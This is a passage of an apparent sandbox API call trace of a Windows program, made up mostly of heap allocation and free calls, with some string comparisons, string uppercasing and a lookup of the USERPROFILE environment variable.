Size=0x8) returned 0x24b1708 [0247.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0247.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0247.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0247.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1e) returned 0x24b3ce0 [0247.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0247.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="soft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ft Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t Help", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0247.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0247.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0247.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0247.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0247.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0247.988] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0247.988] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0247.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0247.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0247.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0247.989] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0247.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.989] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0247.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0247.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0247.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0247.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0247.991] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0247.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0247.991] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0247.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0247.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0247.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0247.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0247.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0247.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0247.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0247.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0247.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0247.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0247.995] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0247.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0247.995] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0247.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0247.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0247.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0247.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0247.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0247.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0247.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0247.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0247.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0247.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0247.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0247.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0247.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: 